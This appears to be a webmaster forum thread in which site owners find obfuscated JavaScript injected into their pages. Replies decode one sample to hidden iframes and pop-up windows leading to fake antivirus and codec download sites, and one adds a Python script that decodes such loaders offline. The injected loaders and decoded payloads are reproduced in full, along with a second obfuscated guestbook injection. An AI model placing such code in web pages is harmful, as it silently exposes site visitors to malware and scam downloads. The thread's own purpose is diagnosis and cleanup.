Is Someone Hacking My Shit?

Status
Not open for further replies.

Fuzzo

Banned
Hey Guys,

Just back from a holiday and noticed that Google has flagged one of my sites as being 'harmful' to users. So I do a quick source code check and something pops up that I'm almost sure hasn't been there before:

</html><!-- ~ --><script type="text/javascript">function oxsletpvxjt(qixfiot){var ddrbvc="";for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));}document.write(ddrbvc);}oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));</script><!-- ~ -->

I then check the file, and it seems to be fine, no sign of any of this code.

It looks highly suspicious, so I have changed all my passwords etc. Waiting on my host to get back to me.

What do you guys think?
 


Run an application security scanner against the site/code.

RatProxy works, as do a number of free utilities, just Google it.
 
That's the newest popular way to get spyware installs. People just scan for vulnerabilities with the permissions on templates, then it appends the encoded JavaScript to the bottom of their sites. You need to remove that quickly and change the permissions on your template files. I had that happen with a few outdated CMSs before.
 
If that is the exact code, it's broken but you should remove it asap.

If you introduced the spaces when you copied and pasted and the code does work, it outputs the following:

Code:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
which is an iframe to a page loaded with popunders and possibly worse (I didn't check the scripts there)

Code:
<!-- BEGIN STANDARD TAG - popunder only - ROS: Run-of-site - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.globalinteractive.com/st?ad_type=pop&ad_size=0x0&section=218703&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1"></SCRIPT>
<!-- END TAG -->

<div style="display:none">
<!-- Start Pop Under - 720x300 Code -->
<script src="http://cds.adecn.com/add/script.js?v=2.2;siteId=61457;spotId=3106;width=720;height=300">
</script>
<!-- End Pop Under - 720x300 Code -->
</div>
<div style="display:none">
<!-- Start Pop Under - 720x300 Code -->
<script src="http://cds.adecn.com/add/script.js?v=2.2;siteId=64583;spotId=8993;width=720;height=300;method=popAd">
</script>
<!-- End Pop Under - 720x300 Code --></div>

<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>
         
<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>

No way to know if it was your code that allowed them to insert the script without viewing your code, hopefully your host can help.

Just remove all instances of that script and make sure your permissions are set correctly (nothing world writable)

Let me guess, cheap inexperienced PHP programmer programmed the site?
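The reply above decodes the injected tag by hand. As an added example (my code, not anything posted in the thread), here is a small Python script that does the same decoding offline, so nobody has to run the injected JavaScript in a browser to see what it writes. It takes the posted tag verbatim as its sample input, checks for the "script after </html>" appended-injection pattern, strips the junk token, turns the hex pairs back into characters and reports any hidden iframe sources in the result. The function names and the regexes are my own assumptions about the loader shape seen here, not a general-purpose malware scanner.

```python
import re

# Constructed sample input: the injected tag posted in the thread, verbatim.
# It sits after </html>, which is itself a tell: nothing legitimate belongs
# after the closing html tag.
SAMPLE = '</html><!-- ~ --><script type="text/javascript">function oxsletpvxjt(qixfiot){var ddrbvc="";for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));}document.write(ddrbvc);}oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));</script><!-- ~ -->'

# Shape of the loader call seen in the thread (an assumption of this example):
#   name("<hex digits interleaved with a junk token>".replace(/junk/g, ""))
LOADER_CALL = re.compile(r'\b(\w+)\("([0-9A-Za-z]+)"\.replace\(/(\w+)/g,\s*""\)\)')

# Fragments of the decoder body the loader depends on: hex pair -> char -> write.
DECODER_HINTS = ("parseInt(", ",16)", "String.fromCharCode", "document.write")


def decode_hex_payload(payload: str, junk: str) -> str:
    """Mirror what the injected JS does at runtime, but offline: drop the junk
    token, then map each two-digit hex pair to one character."""
    cleaned = payload.replace(junk, "") if junk else payload
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", cleaned):
        raise ValueError("payload is not a clean hex string after junk removal")
    # parseInt(pair, 16) + fromCharCode yields one code point per byte;
    # latin-1 decoding reproduces that mapping exactly.
    return bytes.fromhex(cleaned).decode("latin-1")


def script_after_html_close(page: str) -> bool:
    """True when a <script> appears after </html>: the appended-injection
    pattern the thread describes."""
    idx = page.lower().rfind("</html>")
    return idx != -1 and "<script" in page[idx:].lower()


def hidden_iframe_sources(markup: str) -> list:
    """Return the src of every iframe styled to be invisible to the visitor."""
    found = []
    for tag in re.findall(r"<iframe\b[^>]*>", markup, flags=re.IGNORECASE):
        src = re.search(r'src="([^"]*)"', tag)
        style = re.search(r'style="([^"]*)"', tag)
        style_text = style.group(1).replace(" ", "").lower() if style else ""
        if src and ("display:none" in style_text or "visibility:hidden" in style_text):
            found.append(src.group(1))
    return found


def find_loaders(page: str) -> list:
    """Locate hex-loader calls in a page and decode what they would write."""
    results = []
    has_decoder = all(h in page.replace(" ", "") for h in DECODER_HINTS)
    for name, payload, junk in LOADER_CALL.findall(page):
        try:
            decoded = decode_hex_payload(payload, junk)
        except ValueError as exc:
            decoded = f"<undecodable: {exc}>"
        results.append({
            "function": name,
            "junk_token": junk,
            "decoder_present": has_decoder,
            "decoded": decoded,
            "hidden_iframes": hidden_iframe_sources(decoded),
        })
    return results


if __name__ == "__main__":
    print("script after </html>:", script_after_html_close(SAMPLE))
    for hit in find_loaders(SAMPLE):
        print(hit)
```

Run it against a saved copy of the affected page rather than the live site; if the decoded output is an iframe with display:none or visibility:hidden, that is the same hidden-iframe payload the reply above arrived at by hand, and every template carrying the loader needs the tag removed and its permissions tightened.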
 
I had a similar thing happen this past weekend. A client's guest book was spammed a couple of times which has never happened in 2 years since the site went up.

I noticed strange figures on the bottom of 3 pages and found this in the source:

Code:
<!---->
--b1a5d27b9cc4a62eef5fcf13739216d6-><script
 language="javascript">pmsz="%";tpu="<&73cript lang&75&61&67&65&3d&6a&61v&61scrip&74>&20&20f&75&6ec&74&69&6fn byv&61&28j&29&7bvar&20&69&76s,oz=\"&72&47]&7e&78:&5e&74&6b&4d&42T&62p&49&6641-@&75&33+[&64V&63|\\&22&68n&67&45&6dC&5a&36$,F&2e e&60U9A&26&2a&77j&4b&27&3do&50q&29Jy(Ni#_&61&48&7as}l2v&4f&387!{&30&3b&35\"&2c&73&3d\"\",p&2c&6bwt,r=\"\",s&73&3bf&6f&72(i&76s=&30;i&76&73&3c&6a.le&6e&67th;ivs++){ p=j.&63h&61&72At&28&69&76s&29;&6b&77t&3doz&2ein&64&65xOf(p&29&3bif&28kw&74>&2d&31){ ss=&28&28k&77&74&2b1&29&258&31-1);&69f&28&73&73&3c=&30&29s&73+&3d8&31&3b&72&2b=&6fz.cha&72&41t&28ss&2d&31); }&20e&6c&73e &72+&3dp;}&73&2b&3dr&3b&64oc&75&6dent.w&72it&65(&73);&7d&3c&2fs&63ript&3e";iwb=unescape(tpu.replace(/&/g,pmsz));var a,k;document.write(iwb);a="<}|G#Ike2HgE3HE`ohKHOH}|G#Ikh>eVP|3C`gk jG#k`Neh<SZRfqbe2HgE3HE`o\\hyHOHS|G#Ik\\heSRZo\\hnkkI^//jjj EPPE2`HgH2#k#|} g`k/aa3kp K}?h[VP|3C`gk G`4`GG`G[h\\h><\\/SZRfqb>heJ5e</}|G#Ik>ee";byva(a);</script>
This site is one of the only static sites that I manage. It was made with GoLive and uses Advanced Guestbook. The guestbook captcha is over 2 years old and probably needs updating.

Strange
 